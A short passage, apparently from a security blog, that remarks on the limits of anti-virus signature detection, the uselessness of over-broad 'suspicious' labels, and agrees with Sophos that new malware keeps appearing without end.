Obviously that's not precisely true. Anti-virus technologies are generally OK at detecting the stuff they've seen before and with generic catch-all signatures they can often capture or label related families of malware as being malicious - or at the very least "suspicious". The problem tends to grow in to frustration when practically every binary file downloaded from the Internet gets marked as "suspicious" - and hence the label becomes meaningless.

Despite all this, Sophos is spot on - there's an intinite number of malware out there, and there'll be more tomorrow. Welcome to the day after yesterday.

 
Internet